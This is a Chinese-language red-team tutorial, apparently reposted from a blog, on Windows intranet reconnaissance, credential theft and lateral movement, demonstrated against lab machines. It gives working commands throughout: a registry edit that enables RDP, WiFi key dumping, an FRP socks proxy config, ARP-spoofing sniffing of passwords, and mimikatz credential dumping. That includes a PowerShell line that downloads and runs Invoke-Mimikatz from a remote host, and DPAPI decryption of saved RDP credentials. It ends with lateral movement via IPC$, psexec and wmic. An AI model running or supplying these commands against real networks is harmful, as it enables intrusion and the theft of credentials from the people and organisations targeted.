其他分享
首页 > 其他分享> > 4.内网信息收集(补充)

4.内网信息收集(补充)

作者:互联网

0x01. 内网机器信息收集

1. 内网信息收集

内网是分布在一个区域性的网络,也称之为局域网,针对于内网不公开于互联网之上,内网分为好几种类型,有服务器内网、办公区域内网等等,内网可以方便的传输,以及可以保证其数据的安全,其资产不亚于暴露外网的资产多,内网信息收集也是非常重要的。

作为红队来讲,突破内网的前提下就是针对于内网的信息收集,内网的资产分布式很广,不仅是WEB,甚至开放了各种危险端口,在内网中机器不保证其开防火墙,所以我们可以任由横穿,假设内网机器大量没有打补丁的ms17010漏洞,我们就可以横穿其内网了。

再一方面,即使内网很安全,当我们收集到密码之后去撞库,测试一下密码是否被重复使用,也可以实现攻破其他主机。

2. 内网信息收集隐蔽

在收集内网信息的前提下,我们需要针对管理员的登录时间进行查看

net user administrator  // 查看最后登录时间

wevtutil epl security C:\System_log.evtx        // 保存所有日志信息 , 需要管理员权限

举例 : 使用物理机 , 远程链接靶机 , 然后在靶机上执行导出日志 , 打开日志查看是否有远程登录信息

image-20210703153119149

看到了刚才远程链接电脑的IP地址啦

0x02. 内网信息收集命令

1. 内网本机信息收集命令-1

ipconfig /all           查询本机IP信息是否多网卡
net user                 查看本机有几个账户
query user             查看在线的用户
tasklist /v               显示所有运行的进程
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"     查询系统版本
systeminfo         查看补丁信息
net share           查看共享信息
netsh firewall show config        查看防火墙信息
net statistics workstation          查看开机时间

补充 :finsubnet(Mac).py 发现内网具有两张网卡的主机

python27 finsubnet(Mac).py -i 192.168.1.1-192.168.1.254

2. 内网本机信息收集命令-2

wmic product get name,version        查看安装软件
net session                                         查看会话
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f                          开启rdp
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber                                       查看rdp对应的端口
net config workstation                       查看是否存在域环境
netsh wlan show profiles                   查看链接过的wifi
netsh wlan show profiles name="WiFi名称" key=clear命令     查看具体wifi密码

3. RDP连接历史记录

针对某些服务器/个人PC场景,我们可以使用以下命令查看连接过的记录。

注意:是查看当前主机都用远程链接链接过那些主机

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s

image-20210703155638197

4. 针对内网主机提权

使用命令 : systeminfo

将信息复制到即可自动寻找提权exp

http://bugs.hacking8.com/tiquan/

image-20210703155827373

5. 内网资产的脆弱性

漏洞危害(CVE)

敏感信息泄露

服务弱口令

历史密码

浏览器记录

连接历史记录 (xshell等等)

0x03. 内网主机探测及扫描

1. 内网穿透–流量代理

流量代理出网是将目标机器的内网代理出自己的机子,之后再进行扫描,一般代理出网的代理大部分都socks5、socks4,流量代理的工具有很多,个人感觉最好的还是Frp比较稳定。

内网流量转发

#frpc.ini
[common]
server_addr = 0.0.0.0
server_port = 7000
[socks_proxy]
type = tcp
remote_port = 6554
plugin = socks5

2. 内网区域大小探测

我们可以通过arp /a来观察网段的总体情况

私有IP地址有10段、172段、192段,大小 : 从大到小排序的

A类地址

10.0.0.0--10.255.255.255

B类地址

172.16.0.0--172.31.255.255

C类地址

192.168.0.0--192.168.255.255

3. 内网主机存活检测

存活检测,可以使用批量Ping的方式或者使用其他工具软件,也可以将流量代理出来进行扫描

使用NMAP或者其他方式进行检测

当流量代理出来,我们可以使用 proxychains 去调用 nmap 进行对目标内网进行扫描

4. NTSCAN

NTSCAN是比较老的一款工具了,但是他的实用价值非常高,可以直接爆破内网内的主机

先设置账号密码字典

image-20210703161308892

image-20210703162120036

5. 内网弱口令检测

在内网中必定充斥着大量的弱口令服务,所以我们可以对其弱口令进行探测

使用工具:超级弱口令检查工具

image-20210703161600591

6. 脆弱性WEB资产扫描

我们可以使用WebAliveScan对其内网进行脆弱性WEB资产扫描,首先我们收集存活的内网IP之后对其扫描。

地址: https:/lgithub.com/cangqingzhe/WebAliveScan

安装 pip3 install -r requirements.txt

使用 :

python3 webscan.py --target target.txt --port 80

python3 webscan.py --target target.txt --port large

7. 内网流量嗅探

这款工具可以嗅探到内网的流量,并且可以主动收集内网的密码,不过操作可能比较复夺这里我实操来演示

image-20210703162509588

ARP欺骗 , 软件使用教程

image-20210703163426653

image-20210703163447590

然后欺骗我们的靶机119那个

image-20210703164226008

然后靶机119 , 登录一个网站 , 这个站点是明文传输的 ,而且提交的字段在我们的字段字典中

image-20210703164357001

返回攻击机查看 , 得到账号和密码

image-20210703164202859

补充 :关于ARP欺骗之前的笔记有详细

0x04. 内网主机密码收集

1. mimikatz抓取本机密码

mimikatz是一款简单且好用的windows密码抓取神器,该软件可帮助用户一键抓取window密码,操作简单、使用方便。

在域渗透过程中另外一名老师会为大家讲解mimikatz的一些高级使用,这里只做简单介绍

进入到mimikatz目录(必须system权限)
mimikatz.exe     // 启动工具  
privilege::debug  //提升权限
sekurlsa::logonpasswords  //抓取密码

一条命令也可以
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

image-20210703165659195

 //powershell远程加载方式
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.156/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz

2. lazagne抓取密码

LaZagne是一款功能比较多的抓取密码工具,可以抓取windows、wifi、浏览器、数据库等密码。

下载地址: https://github.com/AlessandroZ/LaZagne/releases/tag/2.4.3

3. xshell密码抓取密码

在内网渗透中可能会发现连接ssh的相关信息,一般都是xshell程序,我们可以使用该程序来对xshell的密码进行破

解,安装以及生成exe的过程如下:

https://github.com/dzxs/Xdecrypt

4. SharpDecryptPwd密码抓取工具

SharpDecryptPwd是一款强大的密码解密工具,支持五种方式,包括native、teamviewer,filezilla、WinSCP、Xmanager。

https://github.com/uknowsec/SharpDecryptPwd

5. mimikatz获取rdp连接记录密码

注意:是获取当前主机链接过那些主机的3389记录

1.查找本地的Credentials (证书) , 靶机执行
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

image-20210704095828571

2.使用mimikatz进行操作 (管理员权限运行)
mimikatz "privilege::debug" "dpapi::cred /in:C:\Users\jack\AppData\Local\Microsoft\Credentials\7AB721DA2E0FEE4E5461654D463F007B" "sekurlsa::dpapi" exit

jack是当前靶机的登录用户(x)

image-20210704100531152

guidMasterkey是我们需要的

image-20210704100643323

根据我们记录的guidMasterkey得到MasterKey(加密密钥)

* MasterKey :  3474791e200b87da22518dda8f043fa2ea4fc7d162562c94cdf835a70b6c0fb4e09fb465f5ac4f92d054bffe8b253ea12d3a5fc26bcce6f23a78689018e4c925

最后就差解密了,我这里面是 , 依然是在mimikatz中执行

dpapi::cred /in:C:\Users\jack\AppData\Local\Microsoft\Credentials\7AB721DA2E0FEE4E5461654D463F007B /masterkey:3474791e200b87da22518dda8f043fa2ea4fc7d162562c94cdf835a70b6c0fb4e09fb465f5ac4f92d054bffe8b253ea12d3a5fc26bcce6f23a78689018e4c925

image-20210704101120975

参考链接 : https://blog.csdn.net/q1352483315/article/details/100075078

0x05. 内网横向渗透演示

1. IPC空连接概述

前提是已经获得了目标机器的账号和密码

IPC(Internet Process Connection)是共享"命名管道"的资源。

它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。

IPC是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c,d,e....和系统自录winnt或windows(admin)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。

2. 建立空连接命令

net share						查看本机共享
net use \\IP地址 "密码" /user:用户名	对其进行空连接
net use \\192.168.0.119\c$ "a" /user:"administrator"

net use \\IP地址 /del 			    删除空连接
net time \\lP地址					查看机器时间

首先在攻击机上用账号和密码进行空连接 , 然后文件管理中访问靶机的C盘

image-20210703172707125

补充 : 如果不能访问可能是权限问题

3. PSEXEC横向工具

微软提供的一种远程命令行工具

可直接用于对远程主机进行命令交互

psexec.exe \\lP -u domainladministrator -p password command
psexec.exe \\192.168.0.119 -u administrator -p a cmd.exe

image-20210703173316461

然后在靶机上查看

image-20210703173221820

4. wmic横向

wmic是一款Windows自带的工具集,可以通过/node选项直接对远程过程调用RPD访问,允许直接执行命令。

wmic /node:192.168.0.119 /user:administrator /password:a             # 连接后面拼接wmic命令
			靶机ip

常见的vmic命令
process call create "cmd.exe"                                           #启动某一程序
process call create "msg jack a" 
process call create "cmd.exe /c echo > c:\1.txt” 
process list brief                                                                 #查看所有进程

image-20210703174209993

image-20210703174308347

image-20210703174253561

标签:收集,查看,补充,主机,密码,mimikatz,net,内网
来源: https://www.cnblogs.com/xcymn/p/15721440.html